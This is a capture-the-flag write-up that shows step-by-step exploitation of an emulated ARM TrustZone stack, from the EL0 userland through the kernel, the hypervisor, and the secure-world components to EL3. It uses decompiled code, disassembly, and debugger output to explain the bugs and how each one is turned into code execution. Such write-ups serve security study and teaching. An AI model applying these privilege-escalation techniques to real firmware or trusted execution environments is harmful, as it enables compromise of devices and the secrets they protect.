But where is EL1? searching for some of the menu strings (“0 - Load key”) and scrolling around yields something interesting - bios.bin contains an ELF header at offset 0xbc010.

000bbfe0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000bbff0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000bc000: 3200 0000 0000 0000 0000 0000 0000 0000  2...............
000bc010: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............ <--
000bc020: 0200 b700 0100 0000 e800 4000 0000 0000  ..........@.....
000bc030: 4000 0000 0000 0000 c8a7 0000 0000 0000  @...............

EL0: Getting started

Extracting the header yields a valid, statically linked ELF file with debug symbols. checksec tells us there is no ASLR, but NX is enabled (we can confirm this is enforced in our debugger). The ELF looks very similar to a standard Linux userland binary, and comes baked with simple libc functions (printf/puts/read/scanf). Based on the strings and functionality, this is definitely our EL0 code. The first task the binary does is to load an opaque trustlet blob via syscall, followed by mapping some “world shared memory” buffers.

void load_trustlet(unsigned __int8 *base, int size)
{
  size_t v4;
  void *v5;
  unsigned int v6;
  TCI *v7;
  unsigned int v8;

  v4 = (size + 4095) & 0xFFFFF000;
  v5 = mmap(0LL, v4, 3, 0, 0, -1LL);
  v6 = tc_register_wsm(v5, (void *)v4);
  if ( v6 == -1 )
  {
    printf("tc_register_wsm: failed to register world shared memory\n");
    exit(0xFFFFFFFFLL);
  }
  memcpy(v5, base, size);
  if ( (unsigned int)tc_init_trustlet(v6, size) )
  {
    printf("tc_init_trustlet: failed to load trustlet\n");
    exit(0xFFFFFFFFLL);
  }
  v7 = (TCI *)mmap(0LL, 0x1000uLL, 3, 0, 0, -1LL);
  v8 = tc_register_wsm(v7, (void *)0x1000);
  if ( v8 == -1 )
  {
    printf("tc_register_wsm: failed to register world shared memory\n");
    exit(0xFFFFFFFFLL);
  }
  tci_buf = v7;
  tci_handle = v8;
}

We can surmise that the WSM buffers are likely shared mappings between normal and secure world. After setting up the trustlet code, the binary inializes a function pointer table with 2 functions, then goes into a loop calling the run() function for 10 iterations.

void run()
{
  int64_t buf_len;
  int idx;
  int cmd;

  printf("cmd> ");
  scanf("%d", &cmd);
  printf("index: ");
  scanf("%d", &idx);
  if ( cmd == 1 )
  {
    printf("key: ");
    scanf("%s", buf); // <---- [A]
    buf_len = (unsigned int)strlen(buf);
  }
  else
  {
    buf_len = 0LL;
  }
  cmdtb[cmd])(buf, (unsigned int)idx, buf_len); // <---- [B]
}

This function is trivially vulnerable. At [A], we use the uncontrolled %s format specifier with scanf() to read into a buf created with mmap earlier. At [B], we invoke a function pointer in the cmdtb, but the (signed) index is not bounded. For that function call we control the data pointed to by the first argument, buf, and the lower 32 bits of the second argument, idx. Since cmdtb is also in the BSS let’s further examine the surrounding memory layout there.

0x0412650: input           ; unsigned __int8 input[256]
0x0412750: cmdtb           ; cmd_func cmdtb[2]
0x0412760: tci_handle      ; unsigned int tci_handle
0x0412768: buf             ; unsigned __int8 *buf
0x0412770: tci_buf         ; TCI *tci_buf

The static buffer input is used directly inside the scanf() function, which invokes our good old friend gets().

int scanf(const unsigned __int8 *fmt, ...)
{
  __va_list_tag va[1];
  __va_list_tag ap[1];

  va_start(va, fmt);
  va_start(ap, fmt);
  gets(input); // <---- full control of input
  return vsscanf(input, fmt, (__va_list *)va);
}

We can write function pointers directly to the input buffer and then invoke them with a negative cmdtb offset, for control of PC. But where to go? Scanning the binary reveals an mprotect syscall, which is perfect. We can populate our shellcode into the buf pointer with scanf in an initial pass, then invoke the function again to set buf_len to 7. Since it’s being read in with scanf, we’ll write a simple alphanumeric stager to read in our real unrestricted payload.

ERROR:   [VMM] RWX pages are not allowed

Oops! Seems like the EL2 hypervisor prevents us from mapping RWX. Luckily, we can read in the shellcode first and then just mprotect it R-X, no problem.

EL1: Escalating Privileges

Now that we can execute arbitrary code in EL0 context, we can begin auditing EL1. For this we return back to bios.bin. We’ll again examine the memcpy functions invoked by EL3 to find something that looks like EL1. The blob at 0xb0000, aarch64 code, contains strings prefixed with [KERNEL], so it’s a safe bet. Our primary concern is the syscall interface, since it’s the only interface we know of exposed to EL0. We find the syscall function handler at 0xB8BA8.

4 main syscalls are exposed to us: write, read (only 1 char at a time), mmap, and mprotect. We also have a series of secure call passthrough syscalls, which we’ll revisit later. mmap and mprotect both perform extensive checking on their arguments.

if ( syscall_nr == 0xDE ) // mmap, for example
{
  if ( addr ) // addr must be NULL (no MAP_FIXED)
  {
    prot = -1i64;
  }
  else if ( size & 0xFFF ) // size must be page aligned
  {
    prot = -1i64;
  }
  else
  {
    v12 = el1_find_contiguous_pages(size);
    if ( v12 == -1 )
    {
      prot = -1i64;
    }
    else
    {
      v21 = el1_allocate_el0_page(size);
      for ( j = v12; arg1 + v12 > j; j += 4096i64 )
        el1_change_el0_page_permissions(j, j + v21 - v12, prot);
      prot = v12;
    }
  }
}

write also looks relatively straightforward

else if ( syscall_nr == 0x40 )
{
for ( i = 0i64; i < len; ++i )
  el1_output_char(buffer[i]);
}

That leaves us with only read, which helps us out with a very useful bug.

if ( syscall_nr == 0x3F ) // read
{
    if ( arg2 )
    {
      ch = el1_read_char();
      if ( ch & 0x80000000 )
      {
        arg2 = -1i64;
      }
      else
      {
        *(_BYTE *)outp = ch; // <---- [A]
        arg2 = 1i64;
      }
    }
}

After reading in the character via el1_read_char(), it will write it back to the specified memory address. The kernel is not enforcing PAN hardware protections, so it can write directly to the specified userspace address. Astute readers will notice there’s no null check, or check to see if the address is mapped in userspace, meaning we can pass in any kernel address and write directly to it. This used to be a pretty common bug class but still pops up ever now and then, most recently seen in FreeBSD for example.

The kernel has no ASLR to speak of, but the hypervisor is still enforcing NX. Writing to the stack could be a possibility; smashing our saved frame pointer could allow us to pivot a higher level call and achieve PC control, at which point we can ret2usr and run shellcode off an existing mapping.

I took a different approach however, since I didn’t think of that at the time. Instead, I decided to directly target EL1 translation table entries (TTEs) to replace a kernel page physaddr with that of my shellcode.

Tracing through EL1 boot code, we find el1_setup_user_mappings(), which invokes el1_change_el0_page_permissions() to update TTE values whenever any page will be mapped. This occurs both when EL1 maps itself, as well as when EL1 loads the userspace ELF.

void el1_change_page_permissions(uint64_t virtaddr, uint64_t physaddr, char prot)
{
  uint64_t vaddr; // x22
  int64_t v4; // x19
  int64_t v5; // x20
  int64_t v6; // x21
  int64_t v7; // x0

  vaddr = virtaddr;
  if ( 0x400DC000 > physaddr || (v4 = physaddr, 0x400EB000 <= physaddr) )
  {
    el1_kprintf_0((__int64)"[KERNEL] Try to map illegal PA (user)\n");
    el1_wfi_spinloop();
  }
  if ( prot & 2 )
  {
    v5 = 0x4C3i64;
    v6 = 0x20000000000443i64;
  }
  else
  {
    v5 = 0x443i64;
    v6 = 0x200000000004C3i64;
  }
  if ( !(prot & 4) )
  {
    v6 |= 0x40000000000000ui64;
    v5 |= 0x40000000000000ui64;
  }
  v7 = el1_virt_to_phys(*(_QWORD *)((char *)&unk_C8BD7 + 0x15B9));
  el1_update_page_table(0i64, v7, vaddr, v6 | v4);
  el1_hypervisor_call(1i64, v4, v5, 0i64); // invoke vmm_mmap
  __asm { SYS   #0, c8, c7, #0 }
}

Notice that each translation table operation made also invokes a call to vmm_mmap in EL2 to validate the operation; this is the point at which our earlier attempt to map RWX triggered an abort(). The actual operation itself happens just before that hypercall, in el1_update_page_table.

// translationtable is a qword array
translationtable[((virtaddr >> 12) & 0x1FF))] = physaddr_with_flags;

We can examine these TTEs in a debugger to get an idea of their values, but the above function also maps prot values cleanly to expected flags

gef>  x/i $pc
=> 0xffffffffc000875c:  str     x3, [x1, x2, lsl #3]

// the base of our translation table
gef>  x/4xg $x1
0xffffffffc0023000:     0x002000000002c4c3      0x002000000002d4c3
0xffffffffc0023010:     0x002000000002e4c3      0x0000000000000000

// the virtaddr to be updated
gef>  p $x19
$15 = 0x412000

// the entry for this address, mapped RW
gef>  stepi
gef>  x/xg $x1 + ($x2 << 3)
0xffffffffc0023090:     0x006000000002f443

Abusing the read bug, we can read updated values directly into the PTE entry. But writing still faults! As it turns out, without the el1_hypervisor_call at the end of el1_change_page_permissions, the MMU in EL2 won’t be updated to reflect the changes, and will fault on our write attempt. These memory flags in EL2 seem to be associated with the physical page address, so our writable mappings won’t work directly.

To avoid this, we can twiddle the bits on the TTE to point the existing page to our own, after we’ve already mapped it executable. Then, smashing a single byte in the stored return value on the stack should allow our syscall handler to return to our now-kernel-mapped shellcode page. The final flow of the exploit works as follows.

Copy shellcode from the exploit script onto a RW mapping made with mmap
Update the mapping to be RX
Get its physical page number (deterministic across runs)
Write to EL1’s TTE for the virtal address associated with the base of the kernel. Make it point to our physical page
Smash a byte in the return address on the syscall handler stack. Again, this address will be deterministic. Execution returns to an offset in the first page of EL1, which now points to controlled data :)

EL2: (Almost) bare (emulated) metal

Wow, kernel execution! Normally this would be great, but we’re only 2/6 of the way through. We’re now faced with targeting EL2, also known as the vmm or hypervisor. EL3 init tells us that EL2 starts at offset 0x10000, with a very small amount of code, mostly enabling MSR’s and setting up UART for terminal r/w. The vmm itself is mapped beginning at physical address 0x40100000. Of note as always is the EL2 MMU setup, which gives us another clue to the boot log puzzle.

void __cdecl el2_setup_mappings()
{
  unsigned __int64 i;
  __int64 v1;
  __int64 v2;
  unsigned __int64 j;
  unsigned __int64 k;
  __int64 v5;
  __int64 v6;

  el2_memset(el2_pte, 0, 0x1000i64);
  el2_memset(vmm_translationtables, 0, 0x8000i64);
  for ( i = 0i64; i <= 0x1FFFFF; i += 0x200000i64 )
    el2_pte[(i >> 21) & 0x1FF] = (uint64_t)&vmm_translationtables[512 * ((i >> 21) & 0x1FF)] | 3;
  el2_printf("[VMM] RO_IPA: %08x-%08x\n", v5, v6);
  el2_printf("[VMM] RW_IPA: %08x-%08x\n", v1, v2);
  for ( j = 0i64; j <= 0xBFFF; j += 0x1000i64 )
    el2_mmap(j, 0x443i64);
  for ( k = 0xC000i64; k <= 0x3BFFF; k += 0x1000i64 )
    el2_mmap(k, 0x400000000004C3i64);
  _WriteStatusReg(ARM64_SYSREG(3, 4, 2, 1, 0), (unsigned __int64)el2_pte); // VTTBR_EL2
  _WriteStatusReg(ARM64_SYSREG(3, 4, 2, 1, 2), 0x80000027ui64); // VTCR_EL2
}

At boot, the printfs emitted were as follows

[VMM] RO_IPA: 00000000-0000c000
[VMM] RW_IPA: 0000c000-0003c000

Beginning at 0x40100000, it seems that EL2 reserves 0xC000 bytes for itself and then maps 0x30000 for EL1 and EL0. Those latter entries have the PXNbits set, so the vmm won’t execute off them directly.

The only exposed interface we’ve seen is the hypercall after the TTE update, so let’s take a look at the El2 hypercall interface

_QWORD * el2_handle_hypercall(__int64 *args)
{
  unsigned int v2;
  signed __int64 arg0;
  _QWORD *arg1;
  __int64 arg3;

  v2 = (unsigned int)_ReadStatusReg(ARM64_SYSREG(3, 4, 5, 2, 0)) >> 26;
  arg0 = *args;
  arg1 = (_QWORD *)args[1];
  arg3 = args[3];
  if ( v2 == 0x16 )
  {
    if ( arg0 == 1 )
      arg1 = el2_mmap(arg1, args[2]);
    else
      arg0 = -1i64;
  }
  else
  {
    // ... ignore securecall passthrough for now ...
  }
  *args = arg0;
  return arg1;
}

There’s only one hypercall, which is el2_mmap. Before even opening the function, we envision that any bug must somehow allow us the ability to map an EL2 physical address to a writable mapping in EL1. We’re aware that the two arguments passed, as seen in the EL1 call, are physical address and TTE bits.

IDA has trouble with some of the spinloop functions that don’t return, so we’ll directly examine the assembly. In the interest of space I’ve trimmed it to the relevant sections and annotated it.

0x101E0 el2_mmap              ; CODE XREF: el2_setup_mappings+A4↓p
0x101E0
0x101E0 LSR X2, X0, #0x15
0x101E4 UBFX X4, X0, #0xC, #9
0x101E8 CMP X0, #0x3B,LSL#12  ; Compare the first arg to 0x3b0000
0x101EC B.EQ loc_1024C

0x101F0 STP X29, X30, [SP,#var_10]!
0x101F4 MOV X29, SP
0x101F8 MOV X3, #0xBFFF
0x101FC MOVK X3, #3,LSL#16
0x10200 CMP X0, X3            ; Make sure the first argument is <= 0x3bffff
                              ; otherwise, print "[VMM] Invalid IPA"
0x10204 B.HI loc_10294
0x10208 MOV X3, #0xBFFF
0x1020C CMP X0, X3
0x10210 B.HI loc_10218         ; Check if the argument is > 0xBFFF
                               ; If so, skip this next instruction
0x10214 TBNZ W1, #7, loc_1026C ; Check the TTE flags for bit 7, indicating writable memory
                               ; If so, reject with error:
                               ; "[VMM] try to map writable pages in RO protected area"
                               
0x10218 loc_10218              ; CODE XREF: el2_mmap+30↑j
0x10218 AND X3, X1, #0x7FFFFFFFFFFF80
0x1021C AND X3, X3, #0xFFC00000000000FF
0x10220 CMP X3, #0x80         
0x10224 B.EQ loc_10280         ; 0x80 in the bitflags indicates RWX pages
                               ; [VMM] RWX pages are not allowed
0x10228 MOV X3, #0x40000000   
0x1022C ADD X0, X0, X3
0x10230 ORR X0, X0, X1
0x10234 ADD X2, X4, X2,LSL#9
0x10238 ADRP X1, #vmm_translationtable@PAGE
0x1023C ADD X1, X1, #vmm_translationtable@PAGEOFF
0x10240 STR X0, [X1,X2,LSL#3]  ; All is well; insert the TTE
0x10244 LDP X29, X30, [SP+0x10+var_10],#0x10
0x10248 RET

The checks here are pretty robust. We can’t request writable memory in the EL2 code pages, nor can we pass in a too-large physical address. But there’s one oversight - physical addresses are not required by el2_mmap() to be aligned to 0x1000, and in fact they are never masked off before being written to the table.

The final value inserted into the translation table is (0x40000000 + arg1) | arg2, so the unmodified bottom bits of arg will influence the flags of the entry. Therefore, a call like hypercall(VMM_mmap, 0x14c3, 0x100000) yields the final TTE 0x400114C3, a RW mapping of the EL2 code page0x40101000, which is inside the RO region! Exploitation is short and sweet, requiring only a single buggy hypercall. With some quick scripting, we can copy our shellcode onto our EL1 virtual address and find it dual-mapped as an EL2 page, yielding execution in hypervisor context.

Securecalls, and playing Telephone

With the completion of EL2 we’ve conquered the entirety of normal world! But til this point we’ve ignored all calls to the secure world, which is where we’re find the other 3 flags we’re still missing. As a brief description, ARM segregates execution space into normal and secure worlds, where the only communication between the two is brokered by the Secure Monitor (EL3). secure world is intended for safeguarding personal data, like fingerprints, payment information, or passwords, and it presents an API accessible over “secure calls” made with the smc instruction. Secure world has similar exception levels to normal world, with an S-EL1 (“Trusted OS” or “TEE”) running “Trusted Apps” in the S-EL0 userspace. There’s currently no S-EL2 hypervisor equivalent, but it is coming in ARMv8.4.

smc is privileged and cannot be made directly by EL0, so in our case the EL0 makes a special syscall to flag its intention to EL1.

0x0401B84 ; signed __int64 tc_register_wsm(void *a1, void *a2)
0x0401B84 EXPORT tc_register_wsm
0x0401B84 tc_register_wsm
0x0401B84 MOV             X8, #3
0x0401B88 MOVK            X8, #0xFF00,LSL#16 ; x8 becomes 0xFF000003LL
0x0401B8C SVC             0
0x0401B90 RET
0x0401B90 ; End of function tc_register_wsm
0x0401B90

EL1 contains some basic validation on the securecall arguments in our case, then invokes the smc instruction to generate a trap.

void el1_securecall_passthrough(__int64 a1, __int64 arg1, unsigned __int64 arg2)
{
  unsigned __int64 v4;
  __int64 v5;
  unsigned __int64 i;
  signed __int64 v7;

  v4 = arg2;
  if ( a1 == 0xFF000005i64 )
  {
    if ( !(arg1 & 0xFFF) )
      el1_make_smc(0x83000005i64, (unsigned int)arg1, (unsigned int)arg2, 0i64);
  }
  else if ( a1 == 0xFF000003i64 )
  {
    if ( !(arg2 & 0xFFF) && arg2 <= 0x4000 && !(arg1 & 0xFFF) ) // validate physical page
    {
      v5 = el1_get_page_physaddr(arg1); // make sure the first page is mapped
      if ( (_DWORD)v5 != -1 )
      {
        for ( i = arg1 + 4096; arg1 + v4 > i; i += 4096i64 )
        {
          v7 = el1_get_page_physaddr(i);
          if ( (_DWORD)v7 == -1 || i + v5 - arg1 != v7 ) // make sure subsequent pages are mapped
            return;
        }
        el1_make_smc(0x83000003i64, v5, v4, 0i64); // invoke smc
      }
    }
  }
  else if ( a1 == 0xFF000006i64 && !(arg1 & 0xFFF) )
  {
    el1_make_smc(0x83000006i64, arg1, 0i64, 0i64);
  }
}

EL2 receives the trap inside its handler, since we’re technically under virtualization, and again executes an smc after some validation.

    if ( arg0 == 0x83000003i64 )
    {
      if ( arg1 <= 0x3C000 )
        arg0 = el2_make_smcall(0x83000003i64, arg1 + 0x8000000);
      else
        arg0 = -1i64;
    }
    else
    {
      arg0 = el2_make_smcall(arg0, arg1);
    }

Finally, we reach our secure monitor code in EL3, which does the actual passover into secure world and sets up the arguments. But who finally receives the call?

S-EL0: A whole new (secure) world

Stepping through EL3’s call to S-EL1/S-EL0 in a debugger quickly yields GDB errors. Luckily, with some quick consulting of the README and included patch files, we notice that the organizers included one that changes QEMU’s debug server to return 32bit ARM registers.

-    cc->set_pc = aarch64_cpu_set_pc;
-    cc->gdb_read_register = aarch64_cpu_gdb_read_register;
-    cc->gdb_write_register = aarch64_cpu_gdb_write_register;
-    cc->gdb_num_core_regs = 34;
-    cc->gdb_core_xml_file = "aarch64-core.xml";
-    cc->gdb_arch_name = aarch64_gdb_arch_name;
+    cc->set_pc = arm_cpu_set_pc;
+    cc->gdb_read_register = arm_cpu_gdb_read_register;
+    cc->gdb_write_register = arm_cpu_gdb_write_register;
+    cc->gdb_num_core_regs = 26;
+    cc->gdb_core_xml_file = "arm-core.xml";
+    cc->gdb_arch_name = arm_gdb_arch_name;

It seems like the S-EL0 and S-EL1 implementations actually run 32-bit ARM, not aarch64! We can quickly verify this by pulling the qemu-3.0.0 source and building it with the provided patch. We now lose the ability to debug aarch64, but we can break and see ARM instructions in our secure world. To be precise, it is big-endian ARM, but executing mostly in thumb mode. At this point I chose to create a second idb for bios.bin to help with reversing, and rebased it to be appropriate for S-EL1.

Let’s begin by examining the trustlet blob passed to tc_init_trustlet() back in EL0. The code registered a blob of length 0x750, beginning with the string literal “HITCON\x00\x00”.

00000000: 4849 5443 4f4e 0000 6b12 0000 0010 0000  HITCON..k.......
00000010: 8406 0000 0020 0000 a800 0000 0000 1000  ..... ..........
00000020: 7010 0800 b0b5 8eb0 00af 7860 41f2 6c03  p.........x`A.l.
00000030: c0f2 1803 1b68 7b63 42f2 0003 c0f2 0003  .....h{cB.......
00000040: 07f1 0c04 1d46 0fcd 0fc4 0fcd 0fc4 2b68  .....F........+h
00000050: 2380 7b6b 3b63 3b6b 0122 1a60 3b6b 0c33  #.{k;c;k.".`;k.3
00000060: 07f1 0c02 1146 1846 00f0 f8fa 0020 00f0  .....F.F..... ..
00000070: 0ffb b0b5 90b0 00af 7860 7b68 5b68 fb63  ........x`{h[h.c
00000080: fb6b 092b 09d8 40f2 0002 c0f2 1002 fb6b  .k.+..@........k
00000090: db00 1344 5b68 002b 1ad1 42f2 2403 c0f2  ...D[h.+..B.$...

The consistency of the first 0x20 bytes makes them look like a blob header, meaning this is probably a custom executable format. To understand it better, we’ll have to do some basic reversing of S-EL1.

According to EL3, S-EL1 is loaded at physical address 0xE400000 and from offset 0x20000 in bios.bin. It’s nonsensical in our aarch64 idb, but in our 32bit one we find a distinct interrupt table at that offset. Inside the reset handler we find the usual MSR twiddling and MMU setup. However, we’re instead interested in the function that handles secure calls, since that is the code responsible for tci_init_trustlet(). That handler occurs at 0x2087C, where we find 4 possible secure calls.

void sel1_handle_securecall(int cmd, int arg0, int arg1)
{
  int v0;

  switch ( cmd )
  {
    case 0:
      v0 = sel1_mmap_world_shared_memory(arg0, arg1);
      sel1_return_val_to_normal_world(0x83000007, v0);
      return;
    case 1:
      v0 = sel1_unmap_from_sel0(arg0, arg1);
      sel1_return_val_to_normal_world(0x83000007, v0);
      return;
    case 2:
      v0 = sel1_load_trusted_app(arg0, arg1);
      sel1_return_val_to_normal_world(0x83000007, v0);
      return;
    case 3:
      v0 = sel1_call_trusted_app(arg0);
      sel1_return_val_to_normal_world(0x83000007, v0);
      return;
    default:
      sel1_return_val_to_normal_world(0x83000007, -1);
      return;
  }
}

With the exception of sel1_unmap_from_sel0, we’ve seen these securecalls invoked from EL0. We can peek intosel1_load_trusted_app to better understand the binary format

signed int sel1_load_trusted_inner(_DWORD *trustlet, unsigned int length)
{
  unsigned int v5;
  unsigned int v6;
  unsigned int len;
  _BYTE *v8;

  if ( !sel1_check_sha256(trustlet, length) )   // verify trustlet hash
    return -1;
  v8 = trustlet + trustlet[4] + 0x24;           // get the data section
  len = (((trustlet[4] - 1) >> 12) + 1) << 12;
  if ( sel1_map_page_into_sel0(trustlet[3], len, 10) == -1 )
    return -1;
  v6 = (((trustlet[6] - 1) >> 12) + 1) << 12;   // grab the bss length
  if ( trustlet[6] )
  {
    if ( sel1_map_page_into_sel0(trustlet[5], v6, 14) == -1 )
      return -1;
  }
  v5 = (((trustlet[8] - 1) >> 12) + 1) << 12;
  if ( trustlet[8] )
  {
    if ( sel1_map_page_into_sel0(trustlet[7], v5, 14) == -1 )
      return -1;
  }
  if ( sel1_map_page_into_sel0(0xFF8000u, 0x8000, 14) == -1 ) // map stack
    return -1;
  sel1_memset(trustlet[3], 0, len);
  sel1_memcpy(trustlet[3], trustlet + 0x24, trustlet[4]);// copy in text section
  if ( trustlet[6] )
  {
    sel1_memset(trustlet[5], 0, v6);
    sel1_memcpy(trustlet[5], v8, trustlet[6]);
  }
  if ( trustlet[8] )
    sel1_memset(trustlet[7], 0, v5);
  sel1_memset(0xFF8000, 0, 0x8000);             // set up stack
  sel0_stored_retaddr = trustlet[2];
  sel0_cmdbuf_addr = trustlet[8] + trustlet[7] - 4;
  return 0;
}

After verifying the sha256 of the image against a hardcoded hash, it loads a text, data, and bss section from the buffer. No relocations, so ASLR is off. Armed with this information, we can load the file into IDA and lay out segments at fixed addresses to get an understand of S-EL0.

S-EL0 is a small binary composed of big-endian thumb code. In its command handler, it receives a pointer to a “tci” buffer, where the first dword is a command type. Only load_key and save_key are defined, but of interest is that save_key allocates buffers for the keys via a simple dlmalloc implementation. It invokes malloc() for a new key index, and if an existing key index is given to overwrite, it will first free() the value at that position.

The save_key and load_key functions operate on the handle passed by userspace, where that handle is actually the buffer’s S-EL0 virtual address. This means we can operate on any “buffer” by passing in a arbitrary “handle”.

This heap allocator uses the same chunk header as glibc malloc would use for a smallbin. Rather than multiple freelists based on chunk size, it puts all chunks into a single one comparable to glibc’s unsortedbin list. It does support mmap’d chunks when the size requested is >0x40000. When freeing a non-mmap’d chunk, it will attempt consolidation with the previous next chunks.

After spending some time auditing the heap implementation, I became interested in the mmap chunk code, since if we could get a writable mapping to the page the chunk was in, we’d be able to directly write to the chunk header. Here’s the relevant mmap syscall handler in S-EL1

_BYTE * sel1_mmap_syscall(__int16 req_virtaddr, int size)
{
  int v4;
  _BYTE *v5;

  v4 = size;
  if ( req_virtaddr & 0xFFF )
    return -1;
  if ( size & 0xFFF )
    return -1;
  if ( !size )
    return -1;
  v5 = sel1_find_contig_virtpage(size);
  if ( v5 == -1 || sel1_map_page_into_sel0(v5, v4, 10) == -1 )
    return -1;
  sel1_memset(v5, 0, v4);
  return v5;
}

The code attempts to find a contigous set of virtual addresses to suit the mapping, then sel1_map_page_into_sel0 will choose physical addresses and update the translation tables. Now, take a look at the sel1_map_world_shared_memory securecall handler we had access to via EL0.

signed int sel1_mmap_world_shared_memory(unsigned int physaddr, int size)
{
  signed int v2;
  int v6;

  if ( !size
    || size & 0xFFF
    || physaddr & 0xFFF
    || physaddr < 0x40000000
    || (v6 = sel1_find_contig_virtpage(size), v6 == -1)
    || sel1_map_page_tables(v6, physaddr, size, 2) == -1 )
  {
    v2 = -1;
  }
  else
  {
    v2 = v6;
  }
  return v2;
}

This code uses the same virtual address range! Finally, note the unused munmap syscall and securecall. With these primitives, we’ll actually use the interaction of S-EL1 to pwn S-EL0 in the following way.

Make a mapping in S-EL0 of size 0x40000. We need a buffer this big in S-EL0 as a source for the memcpy() initializing our chunk.
Use the unmap securecall to unmap the first page of the mapping
Map in a single normal world physical page as world shared memory. This will land on our just-freed virtual address
Fill up the trusted app request to cause an mmap’d chunk of size 0x40000 to be created
Free the first page of that chunk with the unmap securecall
Map over it to fully control the chunk header

Once we have control of the chunk header, we’ll twiddle the bits to convert it to a normal chunk, and then abuse heap consolidation’s unsafe-unlink to trigger a write to the saved return address in sel0_free. Everything in S-EL0 is mapped RWX, so we can just return directly to our shellcode buffer and gain S-EL0 execution.

As a final note, ARM doesn’t have msr in the same way aarch64 does, so we read the flag via the mrc instruction

mrc p15,3,r1,c15,c12,0
str r1, [r0]
mrc p15,3,r1,c15,c12,1
str r1, [r0,#4]
mrc p15,3,r1,c15,c12,2
str r1, [r0,#8]
mrc p15,3,r1,c15,c12,3
str r1, [r0,#0xC]
mrc p15,3,r1,c15,c12,4
str r1, [r0,#0x10]
mrc p15,3,r1,c15,c12,5
str r1, [r0,#0x14]
mrc p15,3,r1,c15,c12,6
str r1, [r0,#0x18]
mrc p15,3,r1,c15,c12,7
str r1, [r0,#0x1c]

S-EL1: Failing upwards

To solve S-EL0 we performed some significant reversing on the syscall and securecall interaces of S-EL1. When moving on to S-EL1, my first intuition was to examine the precise operation of the munmap and mmap handlers. These interested me because both secure and normal world pages could be mapped into the virtual address space. Both mmap and map_world_shared_memory store physical pages into the same table. However, the munmap syscall is identical to the securecall, and doesn’t special-case pages from different worlds. Thinking along those lines, the first bug I noticed was inside map_world_shared_memory. It validates that physaddr < 0x40000000, preventing users from mapping pages below the VIRT_MEM assigned by QEMU.

while ( 1 )
{
    if ( !len )
        return 0;
    if ( sel1_update_page_table(virtaddr, physaddr, prot) == -1 )
        break;
    virtaddr += 0x1000;
    physaddr += 0x1000;
    len -= 4096;
}

However later, there’s no checking for integer overflow. Making a call like map_wsm(0xFFFFF000, 0x2000) would result in a virtual address corresponding to first page of EL3 becoming accessible to our S-EL0 shellcode. And in fact, that does happen! But there’s a catch - Since the pages are mapped VIRT_FLASH, QEMU will allow reads but silently (!) drops writes (without faulting) to that address range. Confusingly, gdb can still write to those pages, likely since the QEMU gdbserver doesn’t distinguish between physical page types.

gef> x/i $pc
=> 0x237d318:   str     r3, [r1]
gef> x/xw $r1
0x237c80c:      0x91000042
gef> p $r3
$12 = 0x41414141
gef> stepi
gef> x/xw $r1
0x237c80c:      0x91000042

Taking a step back, it’s likely that any S-EL1 bugs would be present in a syscall, or at least require the use of a syscall. This would require players to have to pwn S-EL0 first, which makes sense from the standpoint of the CTF. One interesting syscall is signal, which allows the trusted application to define a signal handler. The HITCON blob uses this to catch errors and populate the user’s buffer with an error code and string.

signed int sel1_set_signal_handler(int a1, unsigned int a2)
{
  if ( a2 < 0x2400000 && a1 == 11 )
    sel0_sighandler_addr = a2;
  return -1;
}

S-EL1 stores the user’s argument in a global in its memory. Whenever a data or prefetch abort occurs, execution flows to sel1_handle_signal to check for the presence of a defined handler. That function will determine whether the handler is thumb or arm mode (checking the bottom bit) and populate state accordingly.

0x08001588             sel1_data_abort
0x08001588 STR             LR, [SP,#0x3C] ; Store to Memory
0x0800158C MRS             LR, SPSR ; Transfer PSR to Register ; <---- [A]
0x08001590 STR             LR, [SP,#0x40] ; Store to Memory
0x08001594 CPS             #0x13   ; Change Processor State
0x08001598 BL              sel1_save_regs ; Branch with Link
0x0800159C  ---------------------------------------------------------------------------
0x0800159C LDR             R8, [SP,#0x44] ; Load from Memory
0x080015A0 CPS             #0x1F   ; Change Processor State
0x080015A4 MOV             SP, R8  ; Rd = Op2
0x080015A8 MOV             R0, #0x17 ; Rd = Op2
0x080015AC BLX             sel1_handle_signal ; Change stored pc to saved handler
0x080015B0 B               sel1_return_from_interrupt

0x0800187C             sel1_return_from_interrupt
0x0800187C CPS             #0x13   ; Change Processor State
0x08001880 LDR             R0, [SP,#arg_40] ; Load from Memory
0x08001884 MSR             SPSR_cxsf, R0 ; Transfer Register to PSR  ; <---- [B]
0x08001888 B               loc_8001870


0x08001870 BL              sel1_restore_regs
0x08001874 LDR             LR, [SP,#0x3C] ; Load from Memory
0x08001878 MOVS            PC, LR  ; Rd = Op2

sel1_handle_signal primarily is responsible for overwriting the saved PC value. Though this is a data abort handler, it actually looks most similar to a syscall handler, and reuses a lot of code from that. However, data aborts can occur in either S-EL0 or in S-EL1. At point A, the handler saves off the existing SPSR value, containing the current exception level, onto the stack. Later at B, it unambiguously restores to that saved state! The duplicated path from the syscall handler didn’t account for the fact that a syscall in S-EL1 would return to EL3, but a data abort in S-EL1 still returns to S-EL1.

In other words, if we define a signal handler in S-EL0 then trigger a data abort in S-EL1, we’ll execute our shellcode with S-EL1’s exception level.

EL3: Escaping the matrix

EL3 is the final frontier for our challenge. At this point I’d done a reasonable amount of reversing on it already to determine where other exception levels were mapped and how securecalls are passed back and forth through the secure monitor code. After performing system setup, the actual core of EL3 is very small, mainly serving as a shuttling secure monitor service between normal and secure worlds. To this end, S-EL1 is capable of pointing its TTEs at EL3 pages to get an accessible mapping. However, the EL3 code executes directly off the read-only VIRT_FLASH pages, so we cannot write to its codepages directly.

Let’s examine code responsible for shuttling a secure call between worlds, in pursuit of a suitable write target.

if ( cmd != 0x83000007 )
{
  sub_D28();
  sub_310();
}
el3_switch_world(0);
retvalptr = el3_get_world_scratch(1u);
el3_set_current_world(1u);
el3_set_el1_sp(1u);
*retvalptr = v9;
result = retvalptr;

This code is responsible from returning to Normal World’s with an error code. It retrieves a pointer to the Normal World’s (id 1) saved execution state, then overwrites the stored x0 register value. It also transitions back to Normal World before returning.

QWORD * el3_get_world_scratch(unsigned int a1)
{
  return *(_QWORD **)(0xE002410 + 8i64 * a1);
}

As we can see, the scratch buffers are stored as the first two qwords in an array at 0xE002410. This page is within the VIRT_SECURE_MEM physical page range, so we can point to it in our S-EL1 TTE to read and write its contents. If we write a pointer to 0xE002418, we obtain arbitrary write by returning a 64bit value from Secure World. ASLR isn’t enabled on the EL3 stack, so it’s easy enough to clobber the saved return address and jump directly to our shellcode payload running in EL3.

